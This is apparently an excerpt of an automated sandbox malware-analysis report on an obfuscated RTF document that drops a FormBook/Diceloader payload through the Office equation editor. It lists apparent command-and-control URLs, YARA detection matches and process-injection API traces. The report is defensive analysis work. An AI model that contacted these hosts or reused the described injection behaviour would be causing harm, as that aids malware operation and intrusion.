      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ko-or-a-news.comReferer:
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.launchyouglobal.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.launchyouglobal.com/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.launchyouglobal.com/btrd/www.trygenesisx.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.launchyouglobal.comReferer:
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lifeofthobes.uk
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lifeofthobes.uk/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lifeofthobes.uk/btrd/www.thecareskin.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lifeofthobes.ukReferer:
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.martline.website
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.martline.website/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.martline.website/btrd/www.affirmationtotebags.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.martline.websiteReferer:
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mbbwa4wp.cfd
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mbbwa4wp.cfd/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mbbwa4wp.cfd/btrd/www.fcno30.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mbbwa4wp.cfdReferer:
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nashexshop.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nashexshop.com/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nashexshop.com/btrd/www.gynlkj.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nashexshop.comReferer:
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.opmk.monster
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.opmk.monster/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.opmk.monster/btrd/www.martline.website
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.opmk.monsterReferer:
      Source: explorer.exe, 00000009.00000000.421850492.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.422336388.0000000007524000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.928878903.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.929382715.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.421597302.000000000260E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
      Source: explorer.exe, 00000009.00000000.421850492.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.422336388.0000000007524000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.928878903.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.929382715.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.421597302.000000000260E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
      Source: explorer.exe, 00000009.00000002.928878903.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.421597302.000000000260E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerxe
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.solarcyborg.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.solarcyborg.com/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.solarcyborg.com/btrd/PUS
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.solarcyborg.comReferer:
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thecareskin.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thecareskin.com/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thecareskin.com/btrd/www.opmk.monster
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thecareskin.comReferer:
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.trygenesisx.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.trygenesisx.com/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.trygenesisx.com/btrd/www.jejeesclothing.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.trygenesisx.comReferer:
      Source: explorer.exe, 00000009.00000000.420803319.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.928404044.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
      Source: explorer.exe, 00000009.00000000.420803319.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.928404044.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
      Source: explorer.exe, 00000009.00000000.420803319.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.928404044.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0093AC37 LoadImageW,memset,GetObjectW,LoadImageW,memset,GetObjectW,LoadImageW,memset,GetObjectW,GetClientRect,GetWindowDC,CreateCompatibleBitmap,CreateCompatibleDC,CreateCompatibleDC,CreateCompatibleDC,SelectPalette,SelectPalette,RealizePalette,SelectObject,SelectObject,BitBlt,SelectObject,SelectObject,StretchBlt,SelectObject,SelectObject,BitBlt,SelectObject,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,DrawIconEx,SelectObject,SelectPalette,SelectPalette,DeleteDC,DeleteDC,DeleteDC,ReleaseDC,GetLastError,DeleteObject,DeleteObject,DeleteObject,DeleteObject,10_2_0093AC37

      E-Banking Fraud

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Initial sample is an obfuscated RTF file
      Source: initial sampleStatic file information: Filename: na.doc
      Malicious sample detected (through community Yara rule)
      Source: na.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
      Source: 7.2.ihbgfbin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
      Source: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
      Source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
      Source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
      Source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
      Source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
      Source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
      Source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: Process Memory Space: ihbgfbin.exe PID: 3736, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: ihbgfbin.exe PID: 3824, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: mstsc.exe PID: 3948, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Office equation editor drops PE file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\ihbgfbin.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4q0pGnqqpgTTSL7[1].exeJump to dropped file
      Source: C:\Windows\SysWOW64\mstsc.exeProcess Stats: CPU usage > 49%
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 5_2_001B4924 NtQueryInformationProcess,5_2_001B4924
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 5_2_001B891E NtQueryInformationProcess,5_2_001B891E
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D600C4 NtCreateFile,LdrInitializeThunk,7_2_00D600C4
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D60048 NtProtectVirtualMemory,LdrInitializeThunk,7_2_00D60048
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D60078 NtResumeThread,LdrInitializeThunk,7_2_00D60078
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D5F9F0 NtClose,LdrInitializeThunk,7_2_00D5F9F0
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D5F900 NtReadFile,LdrInitializeThunk,7_2_00D5F900
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D5FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_00D5FAD0
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D5FAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_00D5FAE8
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D5FBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_00D5FBB8
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D5FB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_00D5FB68
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D5FC90 NtUnmapViewOfSection,LdrInitializeThunk,7_2_00D5FC90
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D5FC60 NtMapViewOfSection,LdrInitializeThunk,7_2_00D5FC60
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D5FDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_00D5FDC0
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D5FD8C NtDelayExecution,LdrInitializeThunk,7_2_00D5FD8C
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D5FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_00D5FED0
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D5FEA0 NtReadVirtualMemory,LdrInitializeThunk,7_2_00D5FEA0
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D5FFB4 NtCreateSection,LdrInitializeThunk,7_2_00D5FFB4
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D60060 NtQuerySection,7_2_00D60060
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D601D4 NtSetValueKey,7_2_00D601D4
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D6010C NtOpenDirectoryObject,7_2_00D6010C
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D607AC NtCreateMutant,7_2_00D607AC
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D60C40 NtGetContextThread,7_2_00D60C40
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D610D0 NtOpenProcessToken,7_2_00D610D0
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D61148 NtOpenThread,7_2_00D61148
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D5F8CC NtWaitForSingleObject,7_2_00D5F8CC
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D61930 NtSetContextThread,7_2_00D61930
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D5F938 NtWriteFile,7_2_00D5F938
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D5FAB8 NtQueryValueKey,7_2_00D5FAB8
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D5FA50 NtEnumerateValueKey,7_2_00D5FA50
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D5FA20 NtQueryInformationFile,7_2_00D5FA20
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D5FBE8 NtQueryVirtualMemory,7_2_00D5FBE8
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D5FB50 NtCreateKey,7_2_00D5FB50
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D5FC48 NtSetInformationFile,7_2_00D5FC48
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D5FC30 NtOpenProcess,7_2_00D5FC30
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D61D80 NtSuspendThread,7_2_00D61D80
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D5FD5C NtEnumerateKey,7_2_00D5FD5C
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D5FE24 NtWriteVirtualMemory,7_2_00D5FE24
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D5FFFC NtCreateProcessEx,7_2_00D5FFFC
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D5FF34 NtQueueApcThread,7_2_00D5FF34
      Source: C:\Windows\explorer.exeCode function: 9_2_08CDEE12 NtProtectVirtualMemory,9_2_08CDEE12
      Source: C:\Windows\explorer.exeCode function: 9_2_08CDD232 NtCreateFile,9_2_08CDD232
      Source: C:\Windows\explorer.exeCode function: 9_2_08CDEE0A NtProtectVirtualMemory,9_2_08CDEE0A
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022A00C4 NtCreateFile,LdrInitializeThunk,10_2_022A00C4
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022A07AC NtCreateMutant,LdrInitializeThunk,10_2_022A07AC
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0229FAB8 NtQueryValueKey,LdrInitializeThunk,10_2_0229FAB8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0229FAE8 NtQueryInformationProcess,LdrInitializeThunk,10_2_0229FAE8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0229FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_0229FAD0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0229FB68 NtFreeVirtualMemory,LdrInitializeThunk,10_2_0229FB68
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0229FB50 NtCreateKey,LdrInitializeThunk,10_2_0229FB50
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0229FBB8 NtQueryInformationToken,LdrInitializeThunk,10_2_0229FBB8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0229F900 NtReadFile,LdrInitializeThunk,10_2_0229F900
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0229F9F0 NtClose,LdrInitializeThunk,10_2_0229F9F0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0229FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_0229FED0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0229FFB4 NtCreateSection,LdrInitializeThunk,10_2_0229FFB4
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0229FC60 NtMapViewOfSection,LdrInitializeThunk,10_2_0229FC60
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0229FD8C NtDelayExecution,LdrInitializeThunk,10_2_0229FD8C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0229FDC0 NtQuerySystemInformation,LdrInitializeThunk,10_2_0229FDC0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022A0060 NtQuerySection,10_2_022A0060
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022A0078 NtResumeThread,10_2_022A0078
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022A0048 NtProtectVirtualMemory,10_2_022A0048
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022A010C NtOpenDirectoryObject,10_2_022A010C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022A01D4 NtSetValueKey,10_2_022A01D4
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022A0C40 NtGetContextThread,10_2_022A0C40
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022A10D0 NtOpenProcessToken,10_2_022A10D0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022A1148 NtOpenThread,10_2_022A1148
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0229FA20 NtQueryInformationFile,10_2_0229FA20
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0229FA50 NtEnumerateValueKey,10_2_0229FA50
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0229FBE8 NtQueryVirtualMemory,10_2_0229FBE8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0229F8CC NtWaitForSingleObject,10_2_0229F8CC
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0229F938 NtWriteFile,10_2_0229F938
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022A1930 NtSetContextThread,10_2_022A1930
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0229FE24 NtWriteVirtualMemory,10_2_0229FE24
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0229FEA0 NtReadVirtualMemory,10_2_0229FEA0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0229FF34 NtQueueApcThread,10_2_0229FF34
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0229FFFC NtCreateProcessEx,10_2_0229FFFC
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0229FC30 NtOpenProcess,10_2_0229FC30
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0229FC48 NtSetInformationFile,10_2_0229FC48
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0229FC90 NtUnmapViewOfSection,10_2_0229FC90
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0229FD5C NtEnumerateKey,10_2_0229FD5C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_022A1D80 NtSuspendThread,10_2_022A1D80
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0009A330 NtCreateFile,10_2_0009A330
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0009A3E0 NtReadFile,10_2_0009A3E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0009A460 NtClose,10_2_0009A460
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0009A510 NtAllocateVirtualMemory,10_2_0009A510
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0009A3DC NtReadFile,10_2_0009A3DC
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_02049BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,10_2_02049BAF
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0204A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,10_2_0204A036
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_02049BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,10_2_02049BB2
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0204A042 NtQueryInformationProcess,10_2_0204A042
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 5_2_001BA2985_2_001BA298
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 5_2_001B05145_2_001B0514
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 5_2_001B49D95_2_001B49D9
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 5_2_001B5CA95_2_001B5CA9
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 5_2_001B11415_2_001B1141
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 5_2_001B81F05_2_001B81F0
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 5_2_001BA28A5_2_001BA28A
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 5_2_001BA4F75_2_001BA4F7
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 5_2_001BA5085_2_001BA508
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 5_2_001B78F85_2_001B78F8
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 5_2_001B7D305_2_001B7D30
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 5_2_007418805_2_00741880
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 5_2_00740F605_2_00740F60
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 5_2_007423585_2_00742358
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 5_2_00740B285_2_00740B28
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 5_2_007413985_2_00741398
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D6E0C67_2_00D6E0C6
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D6E2E97_2_00D6E2E9
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D963DB7_2_00D963DB
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00E163BF7_2_00E163BF
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00DBA37B7_2_00DBA37B
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00D723057_2_00D72305
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeCode function: 7_2_00DF443E7_2_00DF443E
